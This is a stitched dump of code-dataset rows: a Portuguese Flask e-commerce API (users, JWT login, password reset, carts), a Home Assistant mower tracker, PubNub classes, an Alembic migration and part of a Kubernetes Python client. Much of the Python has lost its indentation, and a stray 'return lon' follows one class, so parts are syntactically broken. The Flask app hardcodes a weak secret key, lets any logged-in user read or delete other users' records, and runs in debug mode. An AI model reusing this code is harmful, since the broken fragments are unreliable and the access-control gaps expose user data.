    cart_id = db.Column(db.Integer, db.ForeignKey('cart.cart_id'))
    quantity = db.Column(db.Integer)
    # Size chosen by the buyer for this line item (string from the client).
    size = db.Column(db.String(5))
    # delete-orphan cascade: removing a cart or product removes its line items.
    product = db.relationship(Product, backref=db.backref("cart_products", cascade="all, delete-orphan"))
    cart = db.relationship(Cart, backref=db.backref("cart_products", cascade="all, delete-orphan"))
class ImageSchema(ma.SQLAlchemyAutoSchema):
    """Marshmallow auto-schema for Image rows (includes the product FK)."""
    class Meta:
        model = Image
        include_fk = True
class ProductSchema(ma.SQLAlchemyAutoSchema):
    """Marshmallow auto-schema for Product rows; nests image URLs only."""
    class Meta:
        model = Product
    # Serialize related images as a list of {"url": ...} objects.
    images = fields.Nested(ImageSchema, many=True, only=['url'])
def token_required(f):
    """Decorator: require a valid JWT in the "x-access-token" header.

    On success the matching User row is passed to the wrapped view as its
    first positional argument; otherwise a 401 JSON response is returned.
    """
    @wraps(f)
    def decorated(*args, **kwargs):
        token = request.headers.get('x-access-token')
        if not token:
            return jsonify({'message' : 'Token is missing!'}), 401
        try:
            data = jwt.decode(token, app.config['SECRET_KEY'])
            current_user = User.query.filter_by(public_id=data['public_id']).first()
        except Exception:
            # Was a bare "except:"; Exception still covers decode/DB errors
            # without swallowing KeyboardInterrupt/SystemExit.
            return jsonify({'message' : 'Token is invalid!'}), 401
        return f(current_user, *args, **kwargs)
    return decorated
@app.route('/user/<public_id>', methods=['GET'])
@cross_origin(supports_credentials=True)
@token_required
def get_one_user(current_user, public_id):
    """Return the public profile of a single user as JSON."""
    found = User.query.filter_by(public_id=public_id).first()
    if found is None:
        return jsonify({'message' : 'Usuário não encontrado!'}), 400
    user_data = {
        'public_id': found.public_id,
        'name': found.name,
        'cpf': found.cpf,
        'birthdate': found.birthdate,
        'gender': found.gender,
        'phone': found.phone,
        'email': found.email,
    }
    return jsonify({'user' : user_data}), 200
@app.route('/users', methods=['POST'])
@cross_origin(supports_credentials=True)
def create_user():
    """Register a new user.

    Validates name, CPF, birthdate (must be 18 or older), gender, phone,
    e-mail and password length, rejects duplicate CPF/e-mail, and stores
    the password as a sha256 hash.
    """
    cpf = CPF()
    data = request.get_json()
    # Age fix: the original compared calendar years only, so a 17-year-old
    # whose birthday falls later in the current year was accepted.  Compare
    # (month, day) as well to get the true completed age.
    birthdate = datetime.datetime.strptime(str(data['birthdate']), "%d/%m/%Y").date()
    today = datetime.date.today()
    age = today.year - birthdate.year - ((today.month, today.day) < (birthdate.month, birthdate.day))
    if not all(x.isalpha() or x.isspace() for x in str(data['name'])) or len(str(data['name'])) < 3 or len(str(data['name'])) > 100:
        return jsonify({'message' : 'Nome inválido!'}), 400
    elif not cpf.validate(str(data['cpf'])):
        return jsonify({'message' : 'CPF inválido!'}), 400
    elif age < 18:
        return jsonify({'message' : 'Usuário menor de idade!'}), 400
    elif str(data['gender']) != "M" and str(data['gender']) != "F":
        return jsonify({'message' : 'Gênero inválido!'}), 400
    elif not str(data['phone']).isdigit() or len(str(data['phone'])) < 10:
        return jsonify({'message' : 'Telefone inválido!'}), 400
    elif not validate_email(str(data['email'])):
        return jsonify({'message' : 'Email inválido!'}), 400
    elif len(str(data['password'])) < 8 or len(str(data['password'])) > 20:
        return jsonify({'message' : 'Senha inválida!'}), 400
    # Application-level uniqueness check (no DB constraint on these columns).
    prospect_cpf = User.query.filter_by(cpf=data['cpf']).first()
    prospect_email = User.query.filter_by(email=data['email']).first()
    if prospect_cpf:
        return jsonify({'message' : 'CPF já cadastrado!'}), 400
    elif prospect_email:
        return jsonify({'message' : 'Email já cadastrado!'}), 400
    hashed_password = generate_password_hash(data['password'], method='sha256')
    new_user = User(public_id=str(uuid.uuid4()), name=data['name'], cpf=data['cpf'], birthdate=data['birthdate'],
    gender=data['gender'], phone=data['phone'], email=data['email'], password=hashed_password, passwordResetToken=None, passwordResetExpires=None)
    db.session.add(new_user)
    db.session.commit()
    return jsonify({'message' : 'Usuário cadastrado com sucesso!'}), 200
@app.route('/users/<public_id>', methods=['DELETE'])
@cross_origin(supports_credentials=True)
@token_required
def delete_user(current_user, public_id):
    """Remove the user identified by public_id; 400 if unknown."""
    target = User.query.filter_by(public_id=public_id).first()
    if target is None:
        return jsonify({'message' : 'Usuário não encontrado'}), 400
    db.session.delete(target)
    db.session.commit()
    return jsonify({'message' : 'Usuário apagado com sucesso!'}), 200
@app.route('/login', methods=['POST'])
@cross_origin(supports_credentials=True)
def login():
    """Authenticate by e-mail/password and return a 30-minute JWT."""
    auth = request.get_json()
    # .get() instead of [] so a request missing either field yields the
    # 401 below instead of an unhandled KeyError (HTTP 500).
    if not auth or not auth.get('email') or not auth.get('password'):
        return jsonify({'message' : 'Email ou senha não foram preenchidos!'}), 401
    user = User.query.filter_by(email=auth['email']).first()
    if not user:
        return jsonify({'message' : 'Email não existe!'}), 401
    if check_password_hash(user.password, auth['password']):
        token = jwt.encode({'public_id' : user.public_id, 'exp' : datetime.datetime.utcnow() + datetime.timedelta(minutes=30)}, app.config['SECRET_KEY'])
        return jsonify({'token' : token.decode('UTF-8'), 'id' : user.public_id, 'name' : user.name, 'email' : user.email}), 200
    return jsonify({'message' : 'Senha incorreta'}), 401
@app.route("/forgot-password", methods=['POST'])
@cross_origin(supports_credentials=True)
def send_email():
data = request.get_json()
user = User.query.filter_by(email=data['email']).first()
if not user:
return jsonify({'message' : "Email não encontrado!"}), 400
password = str(user.email).encode('UTF-8')
passToken = bcrypt.hashpw(password, bcrypt.gensalt())
passToken = re.sub('\W+','', str(passToken))
passExpires = str(datetime.datetime.utcnow() + datetime.timedelta(minutes=15))
user.passwordResetToken = passToken
user.passwordResetExpires = passExpires
db.session.commit()
msg = Message('Recuperação de senha - Gama Sports', sender = app.config['MAIL_USERNAME'], recipients = [user.email])
msg.body = "Olá " + str(user.email) + ", \n\n" + "Acesse o link a seguir para trocar sua senha: \n\n" + "http://localhost:4200/users/recover-password?token=" + str(passToken)
mail.send(msg)
return jsonify({'message' : "Email disparado!"}), 200
@app.route("/reset-password", methods=['POST'])
@cross_origin(supports_credentials=True)
def change_password():
data = request.get_json()
user = User.query.filter_by(passwordResetToken=str(data['token'])).first()
if not user:
return jsonify({'message' : "Token inválido!"}), 400
date_time_exp = datetime.datetime.strptime(user.passwordResetExpires, '%Y-%m-%d %H:%M:%S.%f')
if datetime.datetime.utcnow() > date_time_exp:
return jsonify({'message' : "Token expirado, gere um novo!"}), 400
if len(str(data['password'])) < 8 or len(str(data['password'])) > 20:
return jsonify({'message' : 'Senha inválida!'}), 400
hashed_newpassword = generate_password_hash(data['password'], method='sha256')
user.password = hashed_newpassword
user.passwordResetToken = None
user.passwordResetExpires = None
db.session.commit()
return jsonify({'message' : "Senha trocada com sucesso!"}), 200
@app.route('/products', methods=['GET'])
@cross_origin(supports_credentials=True)
def get_all_products():
    """List all products, optionally filtered by a "search" query param."""
    term = request.args.get("search", None)
    if term:
        pattern = "%{}%".format(term)
        products = Product.query.filter(Product.description.like(pattern)).all()
    else:
        products = Product.query.all()
    if not products:
        return jsonify([]), 200
    return jsonify(ProductSchema(many=True).dump(products)), 200
@app.route('/products/<product_id>', methods=['GET'])
@cross_origin(supports_credentials=True)
def get_product(product_id):
    """Return one product (with nested image URLs) by its id."""
    item = Product.query.filter_by(product_id=product_id).first()
    if item is None:
        return jsonify({'message' : 'Produto não encontrado!'}), 400
    return jsonify(ProductSchema().dump(item)), 200
@app.route('/cart', methods=['POST'])
@cross_origin(supports_credentials=True)
@token_required
def create_cart(current_user):
    """Persist a shopping cart and its line items for the given client."""
    data = request.get_json()
    cart = Cart(total_amount=data['total'], user_id=data['clientId'])
    db.session.add(cart)
    # flush() assigns cart.cart_id without ending the transaction, so the
    # cart and all of its items are committed atomically below.  The
    # original committed once per product and kept a dead "if not cart"
    # check that could never fire after a successful commit.
    db.session.flush()
    for product in data['products']:
        if not product:
            return jsonify({'message' : 'Problema na inclusão do produto'}), 400
        item = CP(product_id=product['id'], cart_id=cart.cart_id,
                  quantity=product['quantity'], size=product['size'])
        db.session.add(item)
    db.session.commit()
    return jsonify({'message' : 'Carrinho salvo com sucesso!'}), 200
if __name__ == '__main__':
app.run(debug=True) | 34.849558 | 178 | 0.675047 | from flask import Flask, request, jsonify, make_response
from flask_sqlalchemy import SQLAlchemy
import uuid
from werkzeug.security import generate_password_hash, check_password_hash
import jwt
import datetime
from functools import wraps
from flask_mail import Mail, Message
import bcrypt
import re
from validate_email import validate_email
from validate_docbr import CPF
from sqlalchemy.ext.declarative import declarative_base
from flask_marshmallow import Marshmallow
from flask_cors import CORS, cross_origin
from marshmallow import fields
Base = declarative_base()
app = Flask(__name__)
mail= Mail(app)
CORS(app, support_credentials=True)
app.config['CORS_HEADERS'] = 'Content-Type'
app.config['SECRET_KEY'] = 'thisissecret'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///banco.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['MAIL_SERVER']='smtp.gmail.com'
app.config['MAIL_PORT'] = 465
app.config['MAIL_USERNAME'] = ''
app.config['MAIL_PASSWORD'] = ''
app.config['MAIL_USE_TLS'] = False
app.config['MAIL_USE_SSL'] = True
mail = Mail(app)
db = SQLAlchemy(app)
ma = Marshmallow(app)
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
public_id = db.Column(db.String(50), unique=True)
name = db.Column(db.String(50))
cpf = db.Column(db.String(11))
birthdate = db.Column(db.String(10))
gender = db.Column(db.String(1))
phone = db.Column(db.String(11))
email = db.Column(db.String(50))
password = db.Column(db.String(80))
passwordResetToken = db.Column(db.String(250))
passwordResetExpires = db.Column(db.String(100))
class Product(db.Model, Base):
__tablename__ = 'products'
product_id = db.Column(db.Integer, primary_key=True)
description = db.Column(db.String(250))
price = db.Column(db.Float)
installments = db.Column(db.Integer)
sizes = db.Column(db.String(50))
availableSizes = db.Column(db.String(50))
gender = db.Column(db.String(1))
material = db.Column(db.String(50))
color = db.Column(db.String(50))
brand = db.Column(db.String(50))
carts = db.relationship('Cart',secondary='cart_products')
class Image(db.Model, Base):
__tablename__ = 'products_imgs'
img_id = db.Column(db.Integer, primary_key=True)
url = db.Column(db.String(300))
product_id = db.Column(db.Integer, db.ForeignKey('products.product_id'))
product = db.relationship('Product', backref='images')
class Cart(db.Model, Base):
__tablename__ = 'cart'
cart_id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
total_amount = db.Column(db.Float)
create_dttm = db.Column(db.DateTime, default=datetime.datetime.utcnow)
user = db.relationship('User', backref='images')
products = db.relationship('Product', secondary = 'cart_products')
class CP(db.Model, Base):
__tablename__ = 'cart_products'
id = db.Column(db.Integer, primary_key=True)
product_id = db.Column(db.Integer, db.ForeignKey('products.product_id'))
cart_id = db.Column(db.Integer, db.ForeignKey('cart.cart_id'))
quantity = db.Column(db.Integer)
size = db.Column(db.String(5))
product = db.relationship(Product, backref=db.backref("cart_products", cascade="all, delete-orphan"))
cart = db.relationship(Cart, backref=db.backref("cart_products", cascade="all, delete-orphan"))
class ImageSchema(ma.SQLAlchemyAutoSchema):
class Meta:
model = Image
include_fk = True
class ProductSchema(ma.SQLAlchemyAutoSchema):
class Meta:
model = Product
images = fields.Nested(ImageSchema, many=True, only=['url'])
def token_required(f):
@wraps(f)
def decorated(*args, **kwargs):
token = None
if 'x-access-token' in request.headers:
token = request.headers['x-access-token']
if not token:
return jsonify({'message' : 'Token is missing!'}), 401
try:
data = jwt.decode(token, app.config['SECRET_KEY'])
current_user = User.query.filter_by(public_id=data['public_id']).first()
except:
return jsonify({'message' : 'Token is invalid!'}), 401
return f(current_user, *args, **kwargs)
return decorated
@app.route('/user/<public_id>', methods=['GET'])
@cross_origin(supports_credentials=True)
@token_required
def get_one_user(current_user, public_id):
user = User.query.filter_by(public_id=public_id).first()
if not user:
return jsonify({'message' : 'Usuário não encontrado!'}), 400
user_data = {}
user_data['public_id'] = user.public_id
user_data['name'] = user.name
user_data['cpf'] = user.cpf
user_data['birthdate'] = user.birthdate
user_data['gender'] = user.gender
user_data['phone'] = user.phone
user_data['email'] = user.email
return jsonify({'user' : user_data}), 200
@app.route('/users', methods=['POST'])
@cross_origin(supports_credentials=True)
def create_user():
cpf = CPF()
data = request.get_json()
if not all(x.isalpha() or x.isspace() for x in str(data['name'])) or len(str(data['name'])) < 3 or len(str(data['name'])) > 100:
return jsonify({'message' : 'Nome inválido!'}), 400
elif not cpf.validate(str(data['cpf'])):
return jsonify({'message' : 'CPF inválido!'}), 400
elif datetime.date.today().year - datetime.datetime.strptime(str(data['birthdate']), "%d/%m/%Y").year < 18:
return jsonify({'message' : 'Usuário menor de idade!'}), 400
elif str(data['gender']) != "M" and str(data['gender']) != "F":
return jsonify({'message' : 'Gênero inválido!'}), 400
elif not str(data['phone']).isdigit() or len(str(data['phone'])) < 10:
return jsonify({'message' : 'Telefone inválido!'}), 400
elif not validate_email(str(data['email'])):
return jsonify({'message' : 'Email inválido!'}), 400
elif len(str(data['password'])) < 8 or len(str(data['password'])) > 20:
return jsonify({'message' : 'Senha inválida!'}), 400
prospect_cpf = User.query.filter_by(cpf=data['cpf']).first()
prospect_email = User.query.filter_by(email=data['email']).first()
if prospect_cpf:
return jsonify({'message' : 'CPF já cadastrado!'}), 400
elif prospect_email:
return jsonify({'message' : 'Email já cadastrado!'}), 400
hashed_password = generate_password_hash(data['password'], method='sha256')
new_user = User(public_id=str(uuid.uuid4()), name=data['name'], cpf=data['cpf'], birthdate=data['birthdate'],
gender=data['gender'], phone=data['phone'], email=data['email'], password=hashed_password, passwordResetToken=None, passwordResetExpires=None)
db.session.add(new_user)
db.session.commit()
return jsonify({'message' : 'Usuário cadastrado com sucesso!'}), 200
@app.route('/users/<public_id>', methods=['DELETE'])
@cross_origin(supports_credentials=True)
@token_required
def delete_user(current_user, public_id):
user = User.query.filter_by(public_id=public_id).first()
if not user:
return jsonify({'message' : 'Usuário não encontrado'}), 400
db.session.delete(user)
db.session.commit()
return jsonify({'message' : 'Usuário apagado com sucesso!'}), 200
@app.route('/login', methods=['POST'])
@cross_origin(supports_credentials=True)
def login():
auth = request.get_json()
if not auth or not auth['email'] or not auth['password']:
return jsonify({'message' : 'Email ou senha não foram preenchidos!'}), 401
user = User.query.filter_by(email=auth['email']).first()
if not user:
return jsonify({'message' : 'Email não existe!'}), 401
if check_password_hash(user.password, auth['password']):
token = jwt.encode({'public_id' : user.public_id, 'exp' : datetime.datetime.utcnow() + datetime.timedelta(minutes=30)}, app.config['SECRET_KEY'])
return jsonify({'token' : token.decode('UTF-8'), 'id' : user.public_id, 'name' : user.name, 'email' : user.email}), 200
return jsonify({'message' : 'Senha incorreta'}), 401
@app.route("/forgot-password", methods=['POST'])
@cross_origin(supports_credentials=True)
def send_email():
data = request.get_json()
user = User.query.filter_by(email=data['email']).first()
if not user:
return jsonify({'message' : "Email não encontrado!"}), 400
password = str(user.email).encode('UTF-8')
passToken = bcrypt.hashpw(password, bcrypt.gensalt())
passToken = re.sub('\W+','', str(passToken))
passExpires = str(datetime.datetime.utcnow() + datetime.timedelta(minutes=15))
user.passwordResetToken = passToken
user.passwordResetExpires = passExpires
db.session.commit()
msg = Message('Recuperação de senha - Gama Sports', sender = app.config['MAIL_USERNAME'], recipients = [user.email])
msg.body = "Olá " + str(user.email) + ", \n\n" + "Acesse o link a seguir para trocar sua senha: \n\n" + "http://localhost:4200/users/recover-password?token=" + str(passToken)
mail.send(msg)
return jsonify({'message' : "Email disparado!"}), 200
@app.route("/reset-password", methods=['POST'])
@cross_origin(supports_credentials=True)
def change_password():
data = request.get_json()
user = User.query.filter_by(passwordResetToken=str(data['token'])).first()
if not user:
return jsonify({'message' : "Token inválido!"}), 400
date_time_exp = datetime.datetime.strptime(user.passwordResetExpires, '%Y-%m-%d %H:%M:%S.%f')
if datetime.datetime.utcnow() > date_time_exp:
return jsonify({'message' : "Token expirado, gere um novo!"}), 400
if len(str(data['password'])) < 8 or len(str(data['password'])) > 20:
return jsonify({'message' : 'Senha inválida!'}), 400
hashed_newpassword = generate_password_hash(data['password'], method='sha256')
user.password = hashed_newpassword
user.passwordResetToken = None
user.passwordResetExpires = None
db.session.commit()
return jsonify({'message' : "Senha trocada com sucesso!"}), 200
@app.route('/products', methods=['GET'])
@cross_origin(supports_credentials=True)
def get_all_products():
search = request.args.get("search", None)
if not search:
products = Product.query.all()
else:
search = "%{}%".format(search)
products = Product.query.filter(Product.description.like(search)).all()
if not products:
return jsonify([]), 200
product_schema = ProductSchema(many=True)
output = product_schema.dump(products)
return jsonify(output), 200
@app.route('/products/<product_id>', methods=['GET'])
@cross_origin(supports_credentials=True)
def get_product(product_id):
    """Fetch a single product by its id; 400 with a message when not found."""
    found = Product.query.filter_by(product_id=product_id).first()
    if not found:
        return jsonify({'message': 'Produto não encontrado!'}), 400
    return jsonify(ProductSchema().dump(found)), 200
@app.route('/cart', methods=['POST'])
@cross_origin(supports_credentials=True)
@token_required
def create_cart(current_user):
    """Persist a cart and its items atomically for the authenticated user.

    Expects JSON {'total', 'clientId', 'products': [{'id', 'quantity', 'size'}, ...]}.
    Returns 400 when any product entry is falsy, 200 on success.
    """
    data = request.get_json()
    products = data['products']
    # Validate the payload up front: the original code committed the cart and
    # per-item rows before validating, so a bad entry mid-loop left a partial
    # cart persisted. (It also checked `if not cart` after the constructor,
    # which can never be falsy — that dead branch is removed.)
    if any(not product for product in products):
        return jsonify({'message': 'Problema na inclusão do produto'}), 400
    cart = Cart(total_amount=data['total'], user_id=data['clientId'])
    db.session.add(cart)
    # flush() assigns cart.cart_id without ending the transaction.
    db.session.flush()
    for product in products:
        db.session.add(CP(product_id=product['id'], cart_id=cart.cart_id,
                          quantity=product['quantity'], size=product['size']))
    # Single commit: cart and all items are saved atomically.
    db.session.commit()
    return jsonify({'message': 'Carrinho salvo com sucesso!'}), 200
if __name__ == '__main__':
    # Development entry point. NOTE(review): debug=True enables the interactive
    # Werkzeug debugger (arbitrary code execution) — must be off in production.
    app.run(debug=True)
79011b2df9a3b23d72bdc7fb63a4b8022b92a715 | 2,238 | py | Python | custom_components/husqvarna_automower/device_tracker.py | kalhimeo/husqvarna_automower | de513b9ab3ef21fe0a934793aa472f90689b85ce | [
"MIT"
] | null | null | null | custom_components/husqvarna_automower/device_tracker.py | kalhimeo/husqvarna_automower | de513b9ab3ef21fe0a934793aa472f90689b85ce | [
"MIT"
] | null | null | null | custom_components/husqvarna_automower/device_tracker.py | kalhimeo/husqvarna_automower | de513b9ab3ef21fe0a934793aa472f90689b85ce | [
"MIT"
] | null | null | null | """Platform for Husqvarna Automower device tracker integration."""
from homeassistant.components.device_tracker import SOURCE_TYPE_GPS
from homeassistant.components.device_tracker.config_entry import TrackerEntity
from homeassistant.helpers.entity import DeviceInfo
from .const import DOMAIN
async def async_setup_entry(hass, entry, async_add_devices) -> None:
    """Set up Husqvarna Automower device trackers for a config entry."""
    session = hass.data[DOMAIN][entry.entry_id]
    # One tracker entity per mower. Only the index is used, so iterate over
    # positions directly instead of enumerate() with an unused item variable.
    # (Original docstring wrongly said "sensor platform".)
    async_add_devices(
        AutomowerTracker(session, idx) for idx in range(len(session.data["data"]))
    )
class AutomowerTracker(TrackerEntity):
    """Device tracker entity exposing an Automower's GPS position."""

    def __init__(self, session, idx) -> None:
        self.session = session
        self.idx = idx
        self.mower = self.session.data["data"][self.idx]
        attributes = self._attributes()
        self.mower_id = self.mower["id"]
        self.mower_name = attributes["system"]["name"]
        self.model = attributes["system"]["model"]
        # Push state to HA whenever the websocket session reports a change.
        self.session.register_cb(
            lambda _: self.async_write_ha_state(), schedule_immediately=True
        )

    def _attributes(self) -> dict:
        """Return the raw attribute payload for this mower."""
        return self.session.data["data"][self.idx]["attributes"]

    @property
    def device_info(self) -> DeviceInfo:
        """Link this entity to the mower device in the registry."""
        return DeviceInfo(identifiers={(DOMAIN, self.mower_id)})

    @property
    def name(self) -> str:
        """Name of the entity."""
        return self.mower_name

    @property
    def unique_id(self) -> str:
        """Unique identifier for this tracker entity."""
        return f"{self.mower_id}_dt"

    @property
    def source_type(self) -> str:
        """Position source type (GPS)."""
        return SOURCE_TYPE_GPS

    @property
    def latitude(self) -> float:
        """Most recent latitude reported by the mower."""
        return self._attributes()["positions"][0]["latitude"]

    @property
    def longitude(self) -> float:
        """Most recent longitude reported by the mower."""
        return self._attributes()["positions"][0]["longitude"]
return lon
| 33.402985 | 87 | 0.645666 | from homeassistant.components.device_tracker import SOURCE_TYPE_GPS
from homeassistant.components.device_tracker.config_entry import TrackerEntity
from homeassistant.helpers.entity import DeviceInfo
from .const import DOMAIN
async def async_setup_entry(hass, entry, async_add_devices) -> None:
session = hass.data[DOMAIN][entry.entry_id]
async_add_devices(
AutomowerTracker(session, idx) for idx, ent in enumerate(session.data["data"])
)
class AutomowerTracker(TrackerEntity):
def __init__(self, session, idx) -> None:
self.session = session
self.idx = idx
self.mower = self.session.data["data"][self.idx]
mower_attributes = self.__get_mower_attributes()
self.mower_id = self.mower["id"]
self.mower_name = mower_attributes["system"]["name"]
self.model = mower_attributes["system"]["model"]
self.session.register_cb(
lambda _: self.async_write_ha_state(), schedule_immediately=True
)
def __get_mower_attributes(self) -> dict:
return self.session.data["data"][self.idx]["attributes"]
@property
def device_info(self) -> DeviceInfo:
return DeviceInfo(identifiers={(DOMAIN, self.mower_id)})
@property
def name(self) -> str:
return self.mower_name
@property
def unique_id(self) -> str:
return f"{self.mower_id}_dt"
@property
def source_type(self) -> str:
return SOURCE_TYPE_GPS
@property
def latitude(self) -> float:
lat = self.__get_mower_attributes()["positions"][0]["latitude"]
return lat
@property
def longitude(self) -> float:
lon = self.__get_mower_attributes()["positions"][0]["longitude"]
return lon
| true | true |
79011baab4598fa373dcd41d8b61c572c42d70f8 | 286 | py | Python | pubnub/models/consumer/channel_group.py | 17media/pubnub-python | ee372eec82f16d3a80a4cd027bca8976755b817f | [
"MIT"
] | null | null | null | pubnub/models/consumer/channel_group.py | 17media/pubnub-python | ee372eec82f16d3a80a4cd027bca8976755b817f | [
"MIT"
] | null | null | null | pubnub/models/consumer/channel_group.py | 17media/pubnub-python | ee372eec82f16d3a80a4cd027bca8976755b817f | [
"MIT"
] | null | null | null | class PNChannelGroupsAddChannelResult(object):
pass
class PNChannelGroupsRemoveChannelResult(object):
pass
class PNChannelGroupsRemoveGroupResult(object):
pass
class PNChannelGroupsListResult(object):
def __init__(self, channels):
self.channels = channels
| 17.875 | 49 | 0.772727 | class PNChannelGroupsAddChannelResult(object):
pass
class PNChannelGroupsRemoveChannelResult(object):
pass
class PNChannelGroupsRemoveGroupResult(object):
pass
class PNChannelGroupsListResult(object):
def __init__(self, channels):
self.channels = channels
| true | true |
79011c678e10d54b747fa9d433dcb10ce843865f | 831 | py | Python | migrations/versions/780c29109b25_.py | mutalisk999/Flog | 5d836e26967b39faebdf2d5a2c558316bf93221b | [
"MIT"
] | 1 | 2020-08-24T03:39:52.000Z | 2020-08-24T03:39:52.000Z | migrations/versions/780c29109b25_.py | mutalisk999/Flog | 5d836e26967b39faebdf2d5a2c558316bf93221b | [
"MIT"
] | null | null | null | migrations/versions/780c29109b25_.py | mutalisk999/Flog | 5d836e26967b39faebdf2d5a2c558316bf93221b | [
"MIT"
] | null | null | null | """empty message
Revision ID: 780c29109b25
Revises: 911cc5d772fc
Create Date: 2020-08-30 15:22:15.026266
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = "780c29109b25"
down_revision = "911cc5d772fc"
branch_labels = None
depends_on = None
def upgrade():
    """Replace feedback's free-text author column with an author_id FK to user.id."""
    # ### commands auto generated by Alembic - please adjust! ###
    # NOTE(review): the FK is created without an explicit name (None); backends
    # that require named constraints (e.g. SQLite batch mode) may need one.
    op.create_foreign_key(None, "feedback", "user", ["author_id"], ["id"])
    op.drop_column("feedback", "author")
    # ### end Alembic commands ###
def downgrade():
    """Revert: restore the free-text feedback.author column and drop the FK."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.add_column("feedback", sa.Column("author", sa.VARCHAR(length=20), nullable=True))
    # NOTE(review): drop_constraint is called with name=None; Alembic requires a
    # constraint name here and this will typically fail at runtime — confirm the
    # actual generated constraint name and supply it.
    op.drop_constraint(None, "feedback", type_="foreignkey")
    # ### end Alembic commands ###
| 26.806452 | 89 | 0.665463 | from alembic import op
import sqlalchemy as sa
revision = "780c29109b25"
down_revision = "911cc5d772fc"
branch_labels = None
depends_on = None
def upgrade():
| true | true |
79011dd3e46a4da63a8123af05f9b59f0d676e6b | 91,264 | py | Python | kubernetes/client/apis/batch_v1_api.py | iguazio/python | c2684bb479d44a49a2010ec4ede5ffa7b17349dd | [
"Apache-2.0"
] | null | null | null | kubernetes/client/apis/batch_v1_api.py | iguazio/python | c2684bb479d44a49a2010ec4ede5ffa7b17349dd | [
"Apache-2.0"
] | null | null | null | kubernetes/client/apis/batch_v1_api.py | iguazio/python | c2684bb479d44a49a2010ec4ede5ffa7b17349dd | [
"Apache-2.0"
] | 1 | 2019-01-10T11:13:52.000Z | 2019-01-10T11:13:52.000Z | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.13.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..api_client import ApiClient
class BatchV1Api(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_namespaced_job(self, namespace, body, **kwargs):
"""
create a Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_namespaced_job(namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1Job body: (required)
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:return: V1Job
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_namespaced_job_with_http_info(namespace, body, **kwargs)
else:
(data) = self.create_namespaced_job_with_http_info(namespace, body, **kwargs)
return data
def create_namespaced_job_with_http_info(self, namespace, body, **kwargs):
"""
create a Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_namespaced_job_with_http_info(namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1Job body: (required)
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:return: V1Job
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'body', 'include_uninitialized', 'pretty', 'dry_run']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_namespaced_job" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `create_namespaced_job`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_namespaced_job`")
collection_formats = {}
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = []
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized']))
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
if 'dry_run' in params:
query_params.append(('dryRun', params['dry_run']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/namespaces/{namespace}/jobs', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Job',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_collection_namespaced_job(self, namespace, **kwargs):
"""
delete collection of Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_collection_namespaced_job(namespace, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str pretty: If 'true', then the output is pretty printed.
